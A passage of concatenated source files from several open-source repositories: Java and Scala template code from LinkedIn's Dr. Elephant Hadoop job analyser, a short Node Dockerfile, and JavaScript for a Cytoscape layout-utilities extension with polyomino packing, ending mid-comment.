<li><a href="@route?@(searchQuery())page=@(paginationStats.getCurrentPage() + 1)">Next</a></li>
}
</div>
<|start_filename|>app/com/linkedin/drelephant/tez/data/TezApplicationData.java<|end_filename|>
/*
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*
*/
package com.linkedin.drelephant.tez.data;
import com.linkedin.drelephant.analysis.ApplicationType;
import com.linkedin.drelephant.analysis.HadoopApplicationData;
import java.util.Properties;
/**
* Tez Application level data structure which hold all task data
*/
public class TezApplicationData implements HadoopApplicationData {
private static final ApplicationType APPLICATION_TYPE = new ApplicationType("TEZ");
private String _appId = "";
private Properties _conf;
private boolean _succeeded = true;
private TezTaskData[] _reduceTasks;
private TezTaskData[] _mapTasks;
private TezTaskData[] _scopeTasks;
private TezCounterData _counterHolder;
private long _submitTime = 0;
private long _startTime = 0;
private long _finishTime = 0;
public boolean getSucceeded() {
return _succeeded;
}
@Override
public String getAppId() {
return _appId;
}
@Override
public Properties getConf() {
return _conf;
}
@Override
public ApplicationType getApplicationType() {
return APPLICATION_TYPE;
}
@Override
public boolean isEmpty() {
return _succeeded && getMapTaskData().length == 0 && getReduceTaskData().length == 0;
}
public TezTaskData[] getReduceTaskData() {
return _reduceTasks;
}
public TezTaskData[] getMapTaskData() {
return _mapTasks;
}
public long getSubmitTime() {
return _submitTime;
}
public long getStartTime() {
return _startTime;
}
public long getFinishTime() {
return _finishTime;
}
public TezCounterData getCounters() {
return _counterHolder;
}
public TezApplicationData setCounters(TezCounterData counterHolder) {
this._counterHolder = counterHolder;
return this;
}
public TezApplicationData setAppId(String appId) {
this._appId = appId;
return this;
}
public TezApplicationData setConf(Properties conf) {
this._conf = conf;
return this;
}
public TezApplicationData setSucceeded(boolean succeeded) {
this._succeeded = succeeded;
return this;
}
public TezApplicationData setReduceTaskData(TezTaskData[] reduceTasks) {
this._reduceTasks = reduceTasks;
return this;
}
public TezApplicationData setMapTaskData(TezTaskData[] mapTasks) {
this._mapTasks = mapTasks;
return this;
}
public TezTaskData[] getScopeTasks() {
return _scopeTasks;
}
public void setScopeTasks(TezTaskData[] _scopeTasks) {
this._scopeTasks = _scopeTasks;
}
public TezApplicationData setSubmitTime(long submitTime) {
this._submitTime = submitTime;
return this;
}
public TezApplicationData setStartTime(long startTime) {
this._startTime = startTime;
return this;
}
public TezApplicationData setFinishTime(long finishTime) {
this._finishTime = finishTime;
return this;
}
public String toString(){
return APPLICATION_TYPE.toString() + " " + _appId;
}
}
<|start_filename|>app/views/results/flowMetricsHistoryResults.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
@(flowDefPair: IdUrlPair, graphType: String, results: java.util.Map[IdUrlPair, java.util.Map[IdUrlPair, java.util.List[models.AppResult]]],
idPairToJobNameMap: java.util.Map[IdUrlPair, String], flowExecTimeList: java.util.List[Long])
@import com.linkedin.drelephant.util.Utils;
@import com.linkedin.drelephant.analysis.Severity
@import scala.Predef; var jobDefIndex = 0
@getSeverityColor(severity: Severity) = @{
var color: String = "#5cb85c"; // LOW or NONE
if(severity.getText.equalsIgnoreCase("CRITICAL")) {
color = "#d9534f"
} else if(severity.getText.equalsIgnoreCase("SEVERE")) {
color = "#e4804e"
} else if(severity.getText.equalsIgnoreCase("MODERATE")) {
color = "#f0ad4e"
}
color
}
@if(results != null && results.nonEmpty) {
<div class="box shadow details-container">
<h4><a href="@flowDefPair.getId()">Flow History</a></h4>
<hr class="horizontal-line">
@if(graphType.equals("resources")) {
<script src="@routes.Assets.at("js/flowresourcehistoryform.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/graphresourcesmetricsutility.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/resourcegraphtooltiputility.js")" type="text/javascript"></script>
} else {
<script src="@routes.Assets.at("js/flowtimehistoryform.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/graphtimemetricsutility.js")" type="text/javascript"></script>
<script src="@routes.Assets.at("js/timegraphtooltiputility.js")" type="text/javascript"></script>
}
<div>
<!-- Performance Score Graph -->
<div class="history-graph">
<img src='@routes.Assets.at("images/loading.gif")' id='loading-indicator' alt='Loading...' class="loading-indicator"/>
<svg class="svg-graph graph-padding" id="visualisation" ></svg>
</div>
<hr>
<!-- The tabular results -->
<div class="table-responsive">
<table class="table table-striped table-bordered table-hover">
<thead>
<tr>
<th class="history-table-first-column">Flow Executions</th>
@for((jobDefPair, jobName) <- idPairToJobNameMap) {
<th class="history-table-metrics-column">
<a href='./newjobhistory?job-def-id=@helper.urlEncode(jobDefPair.getUrl)&select-graph-type=@graphType' data-toggle='tooltip'
title='@jobDefPair.getUrl'>Job @{jobDefIndex = jobDefIndex + 1; jobDefIndex}<br>
@if(jobName.length > 45) { @jobName.substring(0, 41)... } else { @jobName }
</a>
<table class="history-table-metrics-table">
<tr><td>
<!-- div containing the header table -->
<div>
<table class="history-table-metrics-table">
<tbody>
<tr>
<td class="used-resource-block hasTooltip"><img src='@routes.Assets.at("images/usedmemory.png")' class="metrics-icons-table" alt='used resources'/>
<div id="tooltip-div">
<span> The resources used by the stage in GB Hours</span>
</div>
</td>
<td class="wasted-resource-block hasTooltip"><img src='@routes.Assets.at("images/wastedmemory.png")' class="metrics-icons-table" alt='wasted resources'/>
<div id="tooltip-div">
<span> The total resources wasted by the stage in GB Hours</span>
</div>
</td>
<td class="run-time-block hasTooltip"><img src='@routes.Assets.at("images/runtime.png")' class="metrics-icons-table" alt='total runtime'/>
<div id="tooltip-div">
<span> The total running time of the stage in HH:MM:SS</span>
</div>
</td>
<td class="wait-time-block hasTooltip"><img src='@routes.Assets.at("images/waittime.png")' class="metrics-icons-table" alt='total wait time'/>
<div id="tooltip-div">
<span> The total wait time for the stage in HH:MM:SS</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</th>
}
</tr>
</thead>
<tbody>
@for((flowExecPair, jobMap) <- results) {
<tr>
<!-- The First column, execution id -->
<td class="history-table-first-column">
<a class="exectime" href='@flowExecPair.getUrl' data-toggle='tooltip' title='@flowExecPair.getUrl'>Loading...</a>
</td>
<!-- The remaining columns -->
@for((jobDefPair, jobName) <- idPairToJobNameMap) {
<td class="history-table-metrics-column">
@if(jobMap.get(jobDefPair) != null) {
<div>
<table class="table table-bordered history-table-metrics-table">
<tbody>
<tr>
<td class="used-resource-block hasTooltip" >@Utils.getResourceInGBHours(Utils.getTotalResources(jobMap.get(jobDefPair))).split("GB")(0)
</td>
<td class="wasted-resource-block hasTooltip">@Utils.getResourceInGBHours(Utils.getTotalWastedResources(jobMap.get(jobDefPair))).split("GB")(0)
</td>
<td class="run-time-block hasTooltip">@(Utils.getDurationBreakdown(Utils.getTotalRuntime(jobMap.get(jobDefPair))).split("Hours")(0))
</td>
<td class="wait-time-block hasTooltip">@(Utils.getDurationBreakdown(Utils.getTotalWaittime(jobMap.get(jobDefPair))).split("Hours")(0))
</td>
</tr>
</tbody>
</table>
</div>
}
</td>
}
</tr>
}
</tbody>
</table>
</div>
</div>
</div>
}
<|start_filename|>app/models/JobExecution.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package models;
import java.sql.Timestamp;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.EnumType;
import javax.persistence.Enumerated;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.JoinColumn;
import javax.persistence.JoinTable;
import javax.persistence.ManyToOne;
import javax.persistence.Table;
import com.avaje.ebean.annotation.UpdatedTimestamp;
import play.db.ebean.Model;
@Entity
@Table(name = "job_execution")
public class JobExecution extends Model {
private static final long serialVersionUID = 1L;
public enum ExecutionState {
NOT_STARTED, IN_PROGRESS, SUCCEEDED, FAILED, CANCELLED
}
public static class TABLE {
public static final String TABLE_NAME = "job_execution";
public static final String id = "id";
public static final String jobExecId = "jobExecId";
public static final String executionState = "executionState";
public static final String resourceUsage = "resourceUsage";
public static final String executionTime = "executionTime";
public static final String inputSizeInBytes = "inputSizeInBytes";
public static final String jobExecUrl = "jobExecUrl";
public static final String jobDefinition = "jobDefinition";
public static final String flowExecution = "flowExecution";
public static final String job = "job";
public static final String createdTs = "createdTs";
public static final String updatedTs = "updatedTs";
}
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
public Long id;
public String jobExecId;
public String jobExecUrl;
@Enumerated(EnumType.STRING)
public ExecutionState executionState;
public Double resourceUsage;
public Double executionTime;
public Double inputSizeInBytes;
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "flow_execution", joinColumns = {@JoinColumn(name = "flow_execution_id", referencedColumnName = "id")})
public FlowExecution flowExecution;
@Column(nullable = false)
@ManyToOne(cascade = CascadeType.ALL)
@JoinTable(name = "job_definition", joinColumns = {@JoinColumn(name = "job_definition_id", referencedColumnName = "id")})
public JobDefinition job;
@Column(nullable = false)
public Timestamp createdTs;
@Column(nullable = false)
@UpdatedTimestamp
public Timestamp updatedTs;
@Override
public void save() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.save();
}
@Override
public void update() {
this.updatedTs = new Timestamp(System.currentTimeMillis());
super.update();
}
public static Finder<Long, JobExecution> find = new Finder<Long, JobExecution>(Long.class, JobExecution.class);
}
<|start_filename|>app/com/linkedin/drelephant/tuning/JobCompleteDetector.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import controllers.AutoTuningMetricsController;
import java.net.MalformedURLException;
import java.net.URISyntaxException;
import java.util.List;
import models.JobExecution;
import models.JobExecution.ExecutionState;
import models.TuningJobExecutionParamSet;
import org.apache.log4j.Logger;
/**
* This class pools the scheduler for completion status of execution and updates the database with current status
* of the job.
*/
public abstract class JobCompleteDetector {
private static final Logger logger = Logger.getLogger(JobCompleteDetector.class);
/**
* Updates the status of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
public void updateCompletedExecutions() throws MalformedURLException, URISyntaxException {
logger.info("Updating execution status");
List<TuningJobExecutionParamSet> inProgressExecutionParamSet = getExecutionsInProgress();
List<JobExecution> completedExecutions = getCompletedExecutions(inProgressExecutionParamSet);
updateMetrics(completedExecutions);
logger.info("Finished updating execution status");
}
/**
* Updates metrics for auto tuning monitoring for job completion daemon
* @param completedExecutions List completed job executions
*/
private void updateMetrics(List<JobExecution> completedExecutions) {
for (JobExecution jobExecution : completedExecutions) {
if (jobExecution.executionState.equals(ExecutionState.SUCCEEDED)) {
AutoTuningMetricsController.markSuccessfulJobs();
} else if (jobExecution.executionState.equals(ExecutionState.FAILED)) {
AutoTuningMetricsController.markFailedJobs();
}
}
}
/**
* Returns the executions in progress
* @return JobExecution list
*/
private List<TuningJobExecutionParamSet> getExecutionsInProgress() {
logger.info("Fetching the executions which are in progress");
List<TuningJobExecutionParamSet> tuningJobExecutionParamSets = TuningJobExecutionParamSet.find.fetch(TuningJobExecutionParamSet.TABLE.jobExecution)
.fetch(TuningJobExecutionParamSet.TABLE.jobSuggestedParamSet)
.where()
.eq(TuningJobExecutionParamSet.TABLE.jobExecution + '.' + JobExecution.TABLE.executionState,
ExecutionState.IN_PROGRESS)
.findList();
logger.info("Number of executions which are in progress: " + tuningJobExecutionParamSets.size());
return tuningJobExecutionParamSets;
}
/**
* Returns the list of completed executions.
* @param inProgressExecutionParamSet List of executions (with corresponding param set) in progress
* @return List of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
protected abstract List<JobExecution> getCompletedExecutions(
List<TuningJobExecutionParamSet> inProgressExecutionParamSet) throws MalformedURLException, URISyntaxException;
}
<|start_filename|>app/views/help/tez/helpMapperSpeed.scala.html<|end_filename|>
@*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*@
<p>
This analysis shows the speed of tez input tasks.<br>
This should allow you need to adjust the size of your input splits so that input is faster</p>
<p>
This result of the analysis shows problems with tasks with significant slow speeds for the amount of data it needs
to read.
</p>
<h5>Example</h5>
<p>
<div class="list-group">
<a class="list-group-item list-group-item-danger" href="">
<h4 class="list-group-item-heading">Mapper Speed</h4>
<table class="list-group-item-text table table-condensed left-table">
<thead><tr><th colspan="2">Severity: Critical</th></tr></thead>
<tbody>
<tr>
<td>Number of tasks</td>
<td>20</td>
</tr>
<tr>
<td>Average task input size</td>
<td>509 MB</td>
</tr>
<tr>
<td>Average task speed</td>
<td>56 KB/s</td>
</tr>
<tr>
<td>Average task runtime</td>
<td>2hr 5min 54sec</td>
</tr>
</tbody>
</table>
</a>
</div>
</p>
<h3>Suggestions</h3>
<p>
In Tez input tasks sizes are computed by grouping splits together. Please check if tez.grouping.split-count=XX is set. If set, XX number of tasks will be used to read input data.
Else the verify if tez.grouping.min-size and tez.grouping.max-size set to adjust the number of tasks being launched.
If there are multiple small files which need to combined, use
set hive.input.format=org.apache.hadoop.hive.ql.io.CombineHiveInputFormat;
set mapreduce.input.fileinputformat.split.minsize and mapreduce.input.fileinputformat.split.maxsize<br>
<br>
If your tasks are spending a lot of time to read the input splits, check the hive.auto.convert.join.noconditionaltask.size
size to see if large hash tables are being used for map joins. If large number of columns are being inserted, then try
reducing hive.exec.orc.default.buffer.size. If your job is inserting multiple partitions, then set the setting hive.optimize.sort.dynamic.partition
to true
<br>
</p>
<|start_filename|>app/com/linkedin/drelephant/tuning/AzkabanJobCompleteDetector.java<|end_filename|>
/*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.tuning;
import com.linkedin.drelephant.clients.azkaban.AzkabanJobStatusUtil;
import java.net.MalformedURLException;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import models.JobExecution;
import models.JobExecution.ExecutionState;
import models.JobSuggestedParamSet;
import models.JobSuggestedParamSet.ParamSetStatus;
import models.TuningJobExecutionParamSet;
import org.apache.log4j.Logger;
/**
* Job completion detector for azkaban jobs. This utility uses azkaban rest api to find out if the jobs in a flow are
* completed or not.
*/
public class AzkabanJobCompleteDetector extends JobCompleteDetector {
private static final Logger logger = Logger.getLogger(AzkabanJobCompleteDetector.class);
private AzkabanJobStatusUtil _azkabanJobStatusUtil;
public enum AzkabanJobStatus {
FAILED, CANCELLED, KILLED, SUCCEEDED, SKIPPED
}
/**
* Returns the list of completed executions
* @param inProgressExecutionParamSet List of executions (with corresponding param set) in progress
* @return List of completed executions
* @throws MalformedURLException MalformedURLException
* @throws URISyntaxException URISyntaxException
*/
protected List<JobExecution> getCompletedExecutions(List<TuningJobExecutionParamSet> inProgressExecutionParamSet)
throws MalformedURLException, URISyntaxException {
logger.info("Fetching the list of executions completed since last iteration");
List<JobExecution> completedExecutions = new ArrayList<JobExecution>();
try {
for (TuningJobExecutionParamSet tuningJobExecutionParamSet : inProgressExecutionParamSet) {
JobSuggestedParamSet jobSuggestedParamSet = tuningJobExecutionParamSet.jobSuggestedParamSet;
JobExecution jobExecution = tuningJobExecutionParamSet.jobExecution;
logger.info("Checking current status of started execution: " + jobExecution.jobExecId);
if (_azkabanJobStatusUtil == null) {
logger.info("Initializing AzkabanJobStatusUtil");
_azkabanJobStatusUtil = new AzkabanJobStatusUtil();
}
try {
Map<String, String> jobStatus = _azkabanJobStatusUtil.getJobsFromFlow(jobExecution.flowExecution.flowExecId);
if (jobStatus != null) {
for (Map.Entry<String, String> job : jobStatus.entrySet()) {
logger.info("Job Found:" + job.getKey() + ". Status: " + job.getValue());
if (job.getKey().equals(jobExecution.job.jobName)) {
if (job.getValue().equals(AzkabanJobStatus.FAILED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.FAILED;
} else if (job.getValue().equals(AzkabanJobStatus.SUCCEEDED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.SUCCEEDED;
} else if (job.getValue().equals(AzkabanJobStatus.CANCELLED.toString()) || job.getValue()
.equals(AzkabanJobStatus.KILLED.toString()) || job.getValue()
.equals(AzkabanJobStatus.SKIPPED.toString())) {
if (jobSuggestedParamSet.paramSetState.equals(ParamSetStatus.SENT)) {
jobSuggestedParamSet.paramSetState = ParamSetStatus.EXECUTED;
}
jobExecution.executionState = ExecutionState.CANCELLED;
}
if (jobExecution.executionState.equals(ExecutionState.SUCCEEDED) || jobExecution.executionState.equals(
ExecutionState.FAILED) || jobExecution.executionState.equals(ExecutionState.CANCELLED)) {
jobExecution.update();
jobSuggestedParamSet.update();
completedExecutions.add(jobExecution);
logger.info("Execution " + jobExecution.jobExecId + " is completed");
} else {
logger.info("Execution " + jobExecution.jobExecId + " is still in running state");
}
}
}
} else {
logger.info("No jobs found for flow execution: " + jobExecution.flowExecution.flowExecId);
}
} catch (Exception e) {
logger.error("Error in checking status of execution: " + jobExecution.jobExecId, e);
}
}
} catch (Exception e) {
logger.error("Error in fetching list of completed executions", e);
e.printStackTrace();
}
logger.info("Number of executions completed since last iteration: " + completedExecutions.size());
return completedExecutions;
}
}
| Viking-Bird/dr-elephant-test |
<|start_filename|>Dockerfile<|end_filename|>
FROM lanvige/node-deploy:9.5.0-alpine-onbuild
LABEL maintainer="<EMAIL>"
#ENTRYPOINT ["pm2", "start", "--no-daemon", "/app/bin/api"]
# CMD []
| ReganHe/koa2-ts-boilerplate |
<|start_filename|>src/index.js<|end_filename|>
// const impl = require('./core');
// // registers the extension on a cytoscape lib ref
// let register = function( cytoscape ){
// if( !cytoscape ){ return; } // can't register if cytoscape unspecified
// cytoscape( 'core', 'layoutUtilities', impl ); // register with cytoscape.js
// };
// if( typeof cytoscape !== 'undefined' ){ // expose to global cytoscape (i.e. window.cytoscape)
// register( cytoscape );
// }
// module.exports = register;
<|start_filename|>webpack.config.js<|end_filename|>
const path = require('path');
const pkg = require('./package.json');
const camelcase = require('camelcase');
const process = require('process');
const webpack = require('webpack');
const env = process.env;
const NODE_ENV = env.NODE_ENV;
const MIN = env.MIN;
const PROD = NODE_ENV === 'production';
let configs = [
{
devtool: PROD ? false : 'inline-source-map',
entry: './src/pose/pose.ts',
output: {
path: path.join(__dirname, 'src/pose'),
filename: 'pose.js',
library: 'pose',
libraryTarget: 'umd'
},
module: {
rules: [
{
test: /\.tsx?$/,
use: 'ts-loader',
exclude: /node_modules/,
},
/* {
test: /\.tsx?$/,
use: 'babel-loader',
exclude: /node_modules/,
} */
]
},
resolve: {
extensions: [ '.tsx', '.ts', '.js' ],
},
optimization: {
minimize: MIN ? true : false
}
},
{
devtool: PROD ? false : 'inline-source-map',
entry: './src/core/index.js',
output: {
path: path.join( __dirname ),
filename: pkg.name + '.js',
library: camelcase( pkg.name ),
libraryTarget: 'umd'
},
module: {
rules: [
/* { test: /\.js$/, exclude: /node_modules/, use: 'babel-loader' } */
]
},
externals: PROD ? Object.keys( pkg.dependencies || {} ) : [],
optimization: {
minimize: MIN ? true : false
}
}
];
module.exports = configs;
<|start_filename|>src/core/index.js<|end_filename|>
(function () {
'use strict';
// registers the extension on a cytoscape lib ref
var register = function (cytoscape) {
if (!cytoscape) {
return;
} // can't register if cytoscape unspecified
var options = {
idealEdgeLength: 50,
offset: 20,
desiredAspectRatio: 1,
polyominoGridSizeFactor: 1,
utilityFunction: 1, // Maximize adjusted Fullness 2: maximizes weighted function of fullness and aspect ratio
componentSpacing: 80
};
var layoutUtilities = require("./layout-utilities");
cytoscape('core', 'layoutUtilities', function (opts) {
var cy = this;
// If 'get' is given as the param then return the extension instance
if (opts === 'get') {
return getScratch(cy).instance;
}
/**
* Deep copy or merge objects - replacement for jQuery deep extend
* Taken from http://youmightnotneedjquery.com/#deep_extend
* and bug related to deep copy of Arrays is fixed.
* Usage:Object.extend({}, objA, objB)
*/
function extendOptions(out) {
out = out || {};
for (var i = 1; i < arguments.length; i++) {
var obj = arguments[i];
if (!obj)
continue;
for (var key in obj) {
if (obj.hasOwnProperty(key)) {
if (Array.isArray(obj[key])) {
out[key] = obj[key].slice();
} else if (typeof obj[key] === 'object') {
out[key] = extendOptions(out[key], obj[key]);
} else {
out[key] = obj[key];
}
}
}
}
return out;
}
options = extendOptions({}, options, opts);
function getScratch(eleOrCy) {
if (!eleOrCy.scratch("_layoutUtilities")) {
eleOrCy.scratch("_layoutUtilities", {});
}
return eleOrCy.scratch("_layoutUtilities");
}
// create a view utilities instance
var instance = layoutUtilities(cy, options);
// set the instance on the scratch pad
getScratch(cy).instance = instance;
if (!getScratch(cy).initialized) {
getScratch(cy).initialized = true;
}
// return the instance of extension
return getScratch(cy).instance;
});
};
if (typeof module !== 'undefined' && module.exports) { // expose as a commonjs module
module.exports = register;
}
if (typeof define !== 'undefined' && define.amd) { // expose as an amd/requirejs module
define('cytoscape-layout-utilities', function () {
return register;
});
}
if (typeof cytoscape !== 'undefined') { // expose to global cytoscape (i.e. window.cytoscape)
register(cytoscape);
}
})();
<|start_filename|>src/core/polyomino-packing.js<|end_filename|>
class Polyomino {
/**
* @param { number } width width of the polyomino in pixels
* @param { number } height height of the polyomino in pixels
* @param { number } index index in according to the input
* @param { number } x1
* @param { number } y1
* @param { number } gridStep width and height of a grid square
*
* @description
* Note: width and height are added to establish centering according to old layout center
*
* Since width divided by the grid step can be calclated from raw step instead of adding new
* variables I changed width and height and added gridStep variable so that stepWith and stepHeight can be calculated
* from these.
*
* Old width and height properties were containing actually width and height divided by grid step, so I thought stepWidth and
* stepHeight are more convenient names for them.
*/
constructor(x1, y1, width, height, gridStep, index) {
this.width = width;
this.height = height;
this.gridStep = gridStep;
this.grid = new Array(this.stepWidth);
for (var i = 0; i < this.stepWidth; i++) {
this.grid[i] = new Array(this.stepHeight);
for (var j = 0; j < this.stepHeight; j++) {
this.grid[i][j] = false;
}
}
this.index = index; //index of polyomino in the input of the packing function
this.x1 = x1; //kept to determine the amount of shift in the output
this.y1 = y1;//kept to determine the amount of shift in the output
this.location = new Point(-1, -1); //the grid cell coordinates where the polyomino was placed
/** inner center */
this.center = new Point(Math.floor(this.stepWidth / 2), Math.floor(this.stepHeight / 2));// center of polyomino
this.numberOfOccupiredCells = 0;
}
/**
* width of the polyomino divided by grid steps
*/
get stepWidth() {
return Math.floor(this.width / this.gridStep) + 1;
}
/**
* height of the polyomino divided by grid steps
*/
get stepHeight() {
return Math.floor(this.height / this.gridStep) + 1;
}
get x2() {
return this.x1 + this.width;
}
get y2() {
return this.y1 + this.height;
}
/**
* returns the center relative to location inside the grid
*/
get gridStepCenter() {
return this.center.diff(this.location);
}
getBoundingRectangle() {
const polyx1 = this.location.x - this.center.x;
const polyy1 = this.location.y - this.center.y;
return new BoundingRectangle(
polyx1,
polyy1,
// -1 because if length == 1 then x2 == x1
polyx1 + this.stepWidth - 1,
polyy1 + this.stepHeight - 1
);
}
}
class Point {
/**
*
* @param { number } x
* @param { number } y
*/
constructor(x, y) {
this.x = x;
this.y = y;
}
/**
* Returns other - this for x and y
* @param { Point } other
*/
diff(other) {
return new Point(
other.x - this.x,
other.y - this.y
);
}
}
class BoundingRectangle {
/**
* @param { number } x1
* @param { number } y1
* @param { number } x2
* @param { number } y2
*/
constructor(x1, y1, x2, y2) {
this.x1 = x1;
this.x2 = x2;
this.y1 = y1;
this.y2 = y2;
}
center() {
return new Point(
(this.x2 - this.x1) / 2,
(this.y2 - this.y1) / 2
);
}
}
class Cell {
/**
*
* @param { boolean } occupied
* @param { boolean } visited
*/
constructor(occupied, visited) {
this.occupied = occupied; //boolean to determine if the cell is occupied
this.visited = visited; //boolean to determine if the cell was visited before while traversing the cells
}
}
class Grid {
/**
* @param { number } width
* @param { number } height
* @param { number } step
*/
constructor(width, height, step) {
this.width = width;
this.height = height;
this.step = step;
//create and intialize the grid
this.grid = Array.from({ length: this.stepWidth },
((_) => Array.from({ length: this.stepHeight },
((_) => new Cell(false, false)))));
this.center = new Point(Math.floor(this.stepWidth / 2), Math.floor(this.stepHeight / 2));
this.occupiedRectangle = new BoundingRectangle(
Number.MAX_VALUE, Number.MAX_VALUE,
-Number.MAX_VALUE, -Number.MAX_VALUE
); // the bounding rectanble of the occupied cells in the grid
this.numberOfOccupiredCells = 0;
}
/**
* returns the width in terms of grid steps
*/
get stepWidth() {
return Math.floor(this.width / this.step) + 1;
}
/**
* returns the height in terms of grid steps
*/
get stepHeight() {
return Math.floor(this.height / this.step) + 1;
}
/**
* function given a list of cells it returns the direct unvisited unoccupied neighboring cells
*/
getDirectNeighbors(cells, level) {
var resultPoints = [];
if (cells.length == 0) {
for (var i = 0; i < this.stepWidth; i++) {
for (var j = 0; j < this.stepHeight; j++) {
if (this.grid[i][j].occupied) {
resultPoints = resultPoints.concat(this.getCellNeighbors(i, j));
}
}
}
var startIndex = 0;
var endIndex = resultPoints.length - 1;
for (var i = 2; i <= level; i++) {
if (endIndex >= startIndex) {
for (var j = startIndex; j <= endIndex; j++) {
resultPoints = resultPoints.concat(this.getCellNeighbors(resultPoints[j].x, resultPoints[j].y));
}
}
startIndex = endIndex + 1;
endIndex = resultPoints.length - 1;
}
} else {
cells.forEach(function (cell) {
resultPoints = resultPoints.concat(this.getCellNeighbors(cell.x, cell.y));
}.bind(this));
}
return resultPoints;
}
/**
* given a cell at locatoin i,j get the unvistied unoccupied neighboring cell
* @param { number } i
* @param { number } j
*/
getCellNeighbors(i, j) {
var resultPoints = [];
//check all the 8 surrounding cells
if (i - 1 >= 0) {
if (!this.grid[i - 1][j].occupied && !this.grid[i - 1][j].visited) {
resultPoints.push({ x: i - 1, y: j });
this.grid[i - 1][j].visited = true;
}
}
if (i + 1 < this.stepWidth) {
if (!this.grid[i + 1][j].occupied && !this.grid[i + 1][j].visited) {
resultPoints.push({ x: i + 1, y: j });
this.grid[i + 1][j].visited = true;
}
}
if (j - 1 >= 0) {
if (!this.grid[i][j - 1].occupied && !this.grid[i][j - 1].visited) {
resultPoints.push({ x: i, y: j - 1 });
this.grid[i][j - 1].visited = true;
}
}
if (j + 1 < this.stepHeight) {
if (!this.grid[i][j + 1].occupied && !this.grid[i][j + 1].visited) {
resultPoints.push({ x: i, y: j + 1 });
this.grid[i][j + 1].visited = true;
}
}
if (i - 1 >= 0) {
if (!this.grid[i - 1][j].occupied && !this.grid[i - 1][j].visited) {
resultPoints.push({ x: i - 1, y: j });
this.grid[i - 1][j].visited = true;
}
}
if (i - 1 >= 0 && j - 1 >= 0) {
if (!this.grid[i - 1][j - 1].occupied && !this.grid[i - 1][j - 1].visited) {
resultPoints.push({ x: i - 1, y: j - 1 });
this.grid[i - 1][j - 1].visited = true;
}
}
if (i + 1 < this.stepWidth && j - 1 >= 0) {
if (!this.grid[i + 1][j - 1].occupied && !this.grid[i + 1][j - 1].visited) {
resultPoints.push({ x: i + 1, y: j - 1 });
this.grid[i + 1][j - 1].visited = true;
}
}
if (i - 1 >= 0 && j + 1 < this.stepHeight) {
if (!this.grid[i - 1][j + 1].occupied && !this.grid[i - 1][j + 1].visited) {
resultPoints.push({ x: i - 1, y: j + 1 });
this.grid[i - 1][j + 1].visited = true;
}
}
if (i + 1 < this.stepWidth && j + 1 < this.stepHeight) {
if (!this.grid[i + 1][j + 1].occupied && !this.grid[i + 1][j + 1].visited) {
resultPoints.push({ x: i + 1, y: j + 1 });
this.grid[i + 1][j + 1].visited = true;
}
}
return resultPoints;
}
/**
* a function to place a given polyomino in the cell i j on the grid
